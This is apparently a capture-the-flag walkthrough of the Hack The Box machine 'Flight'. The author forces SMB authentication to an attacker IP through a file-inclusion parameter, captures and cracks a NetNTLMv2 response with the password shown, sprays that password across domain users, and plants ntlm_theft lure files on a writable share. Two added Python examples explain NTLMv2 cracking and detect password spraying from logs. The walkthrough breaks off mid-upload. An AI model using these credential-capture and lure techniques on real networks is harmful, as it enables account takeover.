htb-flight
Flight is a Windows-centered box that puts a unique twist on things by exposing both an Apache/PHP website and an internal IIS/ASPX website. I’ll get the PHP site to connect back to my server over SMB, leaking a NetNTLMv2 challenge/response, and crack that to get a plaintext password. I’ll get a list of domain users over RPC, and password spray that password to find another user using the same password. That user has write access to a share, where I’ll drop files designed to provoke another auth back to my server to catch another NetNTLMv2. That user has access to the new IIS site, and can write an ASPX webshell to get a shell as the IIS account. As a service account, it will authenticate over the network as the machine account. I’ll abuse that to get the administrator’s hash and from there a shell.
Recon
nmap
# Nmap 7.93 scan initiated Fri Mar 14 15:20:11 2025 as: nmap -sC -sV -oN flight.nmap 10000 10.10.11.187
Nmap scan report for 10.10.11.187
Host is up (0.0099s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-14 21:20:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-03-14T21:20:27
|_  start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 14 15:21:04 2025 -- 2 IP addresses (1 host up) scanned in 53.39 seconds
This looks like a Windows DC with the domain name flight.htb, and a hostname of G0.
Lots of ports to potentially look at. I’ll prioritize SMB and Web, and check in with LDAP, Kerberos, and DNS if I don’t find what I need from them.
Subdomain Fuzz
Given the use of DNS names, I’ll fuzz port 80 for potential subdomains with wfuzz:
┌──(puck㉿kali)-[~/htb/flight]
└─$ wfuzz -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 7069
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.187/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0
I’ll add both to my /etc/hosts file along with the host name:
10.10.11.187 flight.htb school.flight.htb g0.flight.htb
SMB – TCP 445
crackmapexec (run here as its successor, nxc) confirms the domain and host name:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
It isn’t able to get any information about shares:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] Error getting user: list index out of range
SMB 10.10.11.187 445 G0 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(puck㉿kali)-[~/htb/flight]
└─$ crackmapexec smb 10.10.11.187 --shares -u puck -p ''
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\puck: STATUS_LOGON_FAILURE
flight.htb – TCP 80
Site
The site is for an airline:
Most of the links are dead or just lead back to this page.
Tech Stack
The “AIRLINES International Travel” link leads to index.html, which suggests this is a static site.
Directory Brute Force
I’ll run feroxbuster against the site, and include -x html,php since I know the site is using .html extensions and potentially PHP:
┌──(puck㉿kali)-[~/htb/flight]
└─$ feroxbuster -u http://flight.htb -x html,php
403 GET 9l 30w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 296c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 30w 333c http://flight.htb/images => http://flight.htb/images/
301 GET 9l 30w 329c http://flight.htb/js => http://flight.htb/js/
301 GET 9l 30w 330c http://flight.htb/css => http://flight.htb/css/
200 GET 2l 7w 109c http://flight.htb/images/img3.gif
200 GET 1l 6w 170c http://flight.htb/images/img2.gif
--snip--
503 GET 11l 44w 399c http://flight.htb/examples
200 GET 706l 4305w 291438c http://flight.htb/IMAGES/bg_img.jpg
200 GET 1l 5w 698c http://flight.htb/IMAGES/bg_box1.jpg
403 GET 11l 47w 418c http://flight.htb/licenses
403 GET 11l 47w 418c http://flight.htb/server-status
200 GET 154l 530w 7069c http://flight.htb/Index.html
/phpmyadmin is on the box, but returns a forbidden on visiting:
┌──(puck㉿kali)-[~/htb/flight]
└─$ curl http://flight.htb//phpmyadmin
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at flight.htb Port 80</address>
</body></html>
con, aux, and prn all return 403 with a .php extension, but /con and /con.html return the same. Those are reserved Windows device names, so it seems more like an Apache rule match than an actual page.
Nothing else of interest.
school.flight.htb
Site
The site is for an aviation school:
Tech Stack
The main page is index.php. In fact, the other pages that have content have URLs of the form http://school.flight.htb/index.php?view=about.html.
It’s a very common PHP structure where different pages on a site all use index.php, which defines the header and footer and menus, and then some parameter specifying what page to include as the body. These are often vulnerable to path traversal (reading outside the current directory) and local file include (including PHP code that is executed) vulnerabilities.
Directory Brute Force
feroxbuster finds nothing interesting:
puck@kali$ feroxbuster -u http://school.flight.htb -x html,php
The same false positive blocks for con, aux, and prn show up here.
Auth as svc_apache
File Read
On a Linux box, I’d try to read /etc/passwd. Since this is Windows, I’ll try C:\windows\system32\drivers\etc\hosts, but it returns an error:
http://school.flight.htb/index.php?view=c:\windows\system32\drivers\etc\hosts
In fact, just having view=\ results in the same blocked response. view=. returns nothing, but anything with .. in it also results in the blocked message.
I can try with / instead of \, make sure to use an absolute path, and it works:
http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts
┌──(puck㉿kali)-[~/htb/flight]
└─$ curl http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts
<!DOCTYPE html>
<div id="page">
-snip-
</div>
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
</html>
┌──(puck㉿kali)-[~/htb/flight]
Nothing interesting in that file, but it proves directory traversal and file read. It’s not yet clear if it’s an include or just a read.
RFI Test
HTTP
To figure out if it’s a read or include and if remote files are enabled, I’ll try a remote read over HTTP. This will quickly tell me if remote files are allowed, and if so, show if the site is using include or file_get_contents.
I’ll create a dummy PHP file named poc.txt:
<?php echo 'puck was here'; ?>
I’ll see if the server will load it remotely over HTTP by starting a local HTTP server and trying to include it. It works:
┌──(puck㉿kali)-[~/htb/flight]
└─$ curl http://school.flight.htb/index.php?view=http://10.10.14.3/poc.txt
<!DOCTYPE html>
<html>
--snip--
</div>
<?php echo 'puck was here'; ?>
<div id="footer">
--snip--
</body>
</html>
┌──(puck㉿kali)-[~/htb/flight]
Unfortunately for me, it’s the text of the file, not processed as PHP. The source must be using file_get_contents to load the contents, not include.
SMB
Another way to include a file is over SMB. It won’t get anything that HTTP couldn’t get as far as execution, but the user will try to authenticate, and I could capture a NetNTLMv2 challenge/response (not really a hash, but often called one). I’ll start responder with sudo responder -I tun0, and then visit http://school.flight.htb/index.php?view=//10.10.14.3/share/poc.txt. There’s a hit:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:d49bf1afb16b568e...
Crack NetNTLMv2
john will find the password used by the svc_apache account, “S@Ss!K@*t13”:
┌──(puck㉿kali)-[~/htb/flight]
└─$ john svc_apache-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
S@Ss!K@*t13      (svc_apache)
1g 0:00:00:04 DONE (2025-03-14 15:56) 0.2500g/s 2666Kp/s 2666Kc/s 2666KC/s SADSAM..Ryanelkins
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
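To make clear what john is actually testing against the captured line (and why a captured NetNTLMv2 exchange is only as strong as the password behind it), here is the NTLMv2 computation from MS-NLMP written out as an added example; it is not code from the write-up, and the exchange it builds at the bottom is constructed for the demo rather than taken from the box.

```python
"""Added example, not code from the write-up: the Responder "NTLMv2-SSP Hash"
line rebuilt from MS-NLMP, to show why john can test guesses against it offline.

    user::domain:server_challenge:NTProofStr:blob        (all but names in hex)
    NTLMv2Hash = HMAC-MD5(MD4(UTF16LE(password)), UTF16LE(upper(user) + domain))
    NTProofStr = HMAC-MD5(NTLMv2Hash, server_challenge || blob)

The line carries no password, only a keyed MAC over a challenge chosen by the
capturing server, so it resists guessing exactly as well as the password does.
The exchange at the bottom is constructed for the demo, not the box's capture.
"""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the NT-hash primitive. Spelled out because hashlib's md4 is
    missing on OpenSSL 3 builds that lack the legacy provider."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & _MASK

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            if i < 16:                                   # round 1
                fn, k, s, add = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:                                 # round 2
                j = i - 16
                fn, k, s, add = g, (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:                                        # round 3
                j = i - 32
                fn, k, s, add = h, (0, 2, 1, 3)[j // 4] + (0, 8, 4, 12)[j % 4], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a = rotl((a + fn(b, c, d) + x[k] + add) & _MASK, s)
            a, b, c, d = d, a, b, c                      # rotate so the next step updates the old d
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: the user name is upper-cased, the domain is used as sent."""
    key = nt_hash(password)
    return hmac.new(key, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def responder_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """What the client sent, in the user::domain:chal:proof:blob form Responder prints and john reads."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def candidate_matches(line: str, candidate: str) -> bool:
    """The per-guess check a cracker performs: recompute NTProofStr and compare."""
    user, _, rest = line.partition("::")
    domain, chal, proof, blob = rest.split(":")
    computed = nt_proof(candidate, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(computed, bytes.fromhex(proof))


# Constructed demo exchange (assumption, not the box's capture). The blob is a minimal
# NTLMv2_CLIENT_CHALLENGE: version 01 01, 6 reserved, timestamp, 8-byte client nonce,
# 4 reserved, an empty AV_PAIR list (MsvAvEOL), 4 reserved.
DEMO_CHALLENGE = bytes.fromhex("0123456789abcdef")
DEMO_BLOB = (bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("aaaaaaaaaaaaaaaa")
             + bytes(4) + bytes(4) + bytes(4))
DEMO_LINE = responder_line("demo_user", "DEMO", "Winter2025-demo!", DEMO_CHALLENGE, DEMO_BLOB)

if __name__ == "__main__":
    print(DEMO_LINE)
    for guess in ("password", "Winter2025-demo!"):
        print(f"{guess!r:20} -> {candidate_matches(DEMO_LINE, guess)}")
```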
These creds work over SMB:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
Auth as S.Moon
SMB Enumeration
Shares
crackmapexec shows the shares, including the standard administrative shares (ADMIN$, C$, and IPC$), the standard shares for a Windows DC (NETLOGON and SYSVOL), and three nonstandard shares (Shared, Users, and Web):
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
I’ll take a look in NETLOGON and SYSVOL, but nothing abnormal or useful jumps out.
Users
The Users share looks like it’s the C:\Users directory on Flight:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/users -U svc_apache --password='S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Sep 22 22:16:56 2022
.. DR 0 Thu Sep 22 22:16:56 2022
.NET v4.5 D 0 Thu Sep 22 21:28:03 2022
.NET v4.5 Classic D 0 Thu Sep 22 21:28:02 2022
Administrator D 0 Mon Oct 31 19:34:00 2022
All Users DHSrn 0 Sat Sep 15 09:28:48 2018
C.Bum D 0 Thu Sep 22 22:08:23 2022
Default DHR 0 Tue Jul 20 21:20:24 2021
Default User DHSrn 0 Sat Sep 15 09:28:48 2018
desktop.ini AHS 174 Sat Sep 15 09:16:48 2018
Public DR 0 Tue Jul 20 21:23:25 2021
svc_apache D 0 Fri Oct 21 20:50:21 2022
5056511 blocks of size 4096. 1160682 blocks available
smb: \>
There’s nothing interesting in svc_apache, and svc_apache can’t get into any of the other directories.
Shared
The Shared share looks to be empty:
puck@kali$ smbclient //flight.htb/shared -U svc_apache 'S@Ss!K@*t13'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 20:21:28 2022
.. D 0 Fri Oct 28 20:21:28 2022
7706623 blocks of size 4096. 3749019 blocks available
Web
The Web share has folders for the two websites:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U svc_apache 'S@Ss!K@*t13'
Password for [WORKGROUP\svc_apache]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 22:57:00 2025
.. D 0 Fri Mar 14 22:57:00 2025
flight.htb D 0 Fri Mar 14 22:57:00 2025
school.flight.htb D 0 Fri Mar 14 22:57:00 2025
5056511 blocks of size 4096. 1249397 blocks available
smb: \>
Looking around shows both are basically static websites, with no database or creds or anything useful at this point. I’ll also confirm that svc_apache can’t write to any of these folders.
Password Spray
List Domain Users
I was able to get another user name, C.Bum, from the users share, but there may be more domain users. I’ll use lookupsid.py from Impacket to get a list of more:
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at flight.htb
[*] StringBinding ncacn_np:flight.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: flight\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: flight\Administrator (SidTypeUser)
501: flight\Guest (SidTypeUser)
--snip--
1613: flight\O.Possum (SidTypeUser)
1614: flight\WebDevs (SidTypeGroup)
I’ll use some Bash foo to get that into a list of usernames:
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users
Administrator
Guest
krbtgt
G0$
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum
crackmapexec can also pull this list with the --users flag:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' -d flight.htb --users
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.187 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.10.11.187 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.10.11.187 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.10.11.187 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.10.11.187 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.10.11.187 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.10.11.187 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.10.11.187 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.10.11.187 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.10.11.187 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.10.11.187 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.10.11.187 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
Spray
It’s not uncommon for someone in charge of a service account to reuse their password with that service account. I’ll see if any of the accounts above share that password with crackmapexec. I always like to use the --continue-on-success flag in case more than one matches:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb 10.10.11.187 -u users -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G0$:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
S.Moon uses that same password!
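From the DC's side the spray above has a distinctive shape: one source, one attempt per account, every account in the domain within a few seconds. As an added example (not from the write-up), here is that detection logic run over constructed log lines simplified from Security events 4625 and 4624, using the account list lookupsid returned; the source IPs, timestamps and the benign workstation lines are all constructed.

```python
"""Added example, not part of the write-up: detecting the spray above from the
DC's Security log. The attacker tried one password once against every account,
so per-account bad-password counters stay at 0 or 1 and lockout never fires;
the signal is one source failing against many distinct accounts in a short window.

Log lines are constructed and simplified from events 4625 (failed logon,
status 0xC000006D = STATUS_LOGON_FAILURE) and 4624 (successful logon).
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)      # how close together the failures must be
MIN_DISTINCT_ACCOUNTS = 5          # fewer than this from one source is ordinary typo noise


def parse(line: str) -> dict:
    """'<iso-time> <event-id> key=value ...' -> dict with ts/event plus the fields."""
    ts, event, *pairs = line.split()
    rec = dict(pair.split("=", 1) for pair in pairs)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["event"] = int(event)
    return rec


def detect_spray(lines, window=WINDOW, min_accounts=MIN_DISTINCT_ACCOUNTS) -> dict:
    """Return, per offending source IP, the distinct accounts it failed against inside
    one window and any accounts that then logged on successfully from that source."""
    by_src = defaultdict(list)
    for rec in sorted(map(parse, lines), key=lambda r: r["ts"]):
        by_src[rec["src"]].append(rec)

    findings = {}
    for src, recs in by_src.items():
        failures = [r for r in recs if r["event"] == 4625]
        best, lo = set(), 0
        for hi in range(len(failures)):                      # sliding window over failures
            while failures[hi]["ts"] - failures[lo]["ts"] > window:
                lo += 1
            accounts = {r["user"].lower() for r in failures[lo:hi + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            start = failures[0]["ts"]
            hits = sorted({r["user"] for r in recs if r["event"] == 4624 and r["ts"] >= start})
            findings[src] = {"distinct_failed_accounts": sorted(best),
                             "successes_after_spray": hits}
    return findings


# The 16 accounts lookupsid returned, sprayed from one host within 16 seconds;
# the two that share the password log on successfully, the rest fail.
SPRAYED = ["Administrator", "Guest", "krbtgt", "G0$", "S.Moon", "R.Cold", "G.Lors", "L.Kein",
           "M.Gold", "C.Bum", "W.Walker", "I.Francis", "D.Truff", "V.Stevens", "svc_apache", "O.Possum"]
SHARED_PASSWORD = {"S.Moon", "svc_apache"}

SAMPLE_LOG = [
    f"2025-03-14T21:48:{i:02d} {'4624' if u in SHARED_PASSWORD else '4625'} src=10.10.14.3 "
    f"user={u} domain=flight.htb" + ("" if u in SHARED_PASSWORD else " status=0xC000006D")
    for i, u in enumerate(SPRAYED)
] + [
    # Benign noise from a workstation: one mistyped password, then success.
    "2025-03-14T21:40:12 4625 src=10.10.11.50 user=W.Walker domain=flight.htb status=0xC000006D",
    "2025-03-14T21:40:20 4624 src=10.10.11.50 user=W.Walker domain=flight.htb",
]

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_LOG).items():
        print(f"{src}: {len(info['distinct_failed_accounts'])} accounts failed, "
              f"then succeeded as {info['successes_after_spray']}")
```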
Auth as C.Bum
SMB
In addition to the read access, S.Moon has write access to Shared:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
Capture NetNTLMv2
Background
With write access to an otherwise empty share named Shared, there are files I can drop that might entice any legit visiting user to try to authenticate to my host. This post has a list of some of the ways this can be done. ntlm_theft is a nice tool to create a bunch of these files.
Upload Files
I’ll use ntlm_theft.py to create all the files:
┌──(puck㉿kali)-[~/htb/flight/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.4 -f puck
Created: puck/puck.scf (BROWSE TO FOLDER)
Created: puck/puck-(url).url (BROWSE TO FOLDER)
Created: puck/puck-(icon).url (BROWSE TO FOLDER)
Created: puck/puck.lnk (BROWSE TO FOLDER)
Created: puck/puck.rtf (OPEN)
Created: puck/puck-(stylesheet).xml (OPEN)
Created: puck/puck-(fulldocx).xml (OPEN)
Created: puck/puck.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: puck/puck-(includepicture).docx (OPEN)
Created: puck/puck-(remotetemplate).docx (OPEN)
Created: puck/puck-(frameset).docx (OPEN)
Created: puck/puck-(externalcell).xlsx (OPEN)
Created: puck/puck.wax (OPEN)
Created: puck/puck.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: puck/puck.asx (OPEN)
Created: puck/puck.jnlp (OPEN)
Created: puck/puck.application (DOWNLOAD AND OPEN)
Created: puck/puck.pdf (OPEN AND ALLOW)
Created: puck/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: puck/Autorun.inf (BROWSE TO FOLDER)
Created: puck/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
Connecting from the directory with the ntlm_theft output, I’ll upload all of them to the share:
┌──(puck㉿kali)-[~/htb/flight/ntlm_theft/puck]
└─$ smbclient //flight.htb/shared -U S.Moon 'S@Ss!K@*t13'
Password for [WORKGROUP\S.Moon]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 23:18:37 2025
.. D 0 Fri Mar 14 23:18:37 2025
5056511 blocks of size 4096. 1248834 blocks available
smb: \> prompt false
smb: \> mput *
putting file puck-(stylesheet).xml as \puck-(stylesheet).xml (4.7 kb/s) (average 4.7 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \puck.wax
NT_STATUS_ACCESS_DENIED opening remote file \puck.scf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file puck.application as \puck.application (55.5 kb/s) (average 28.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(icon).url
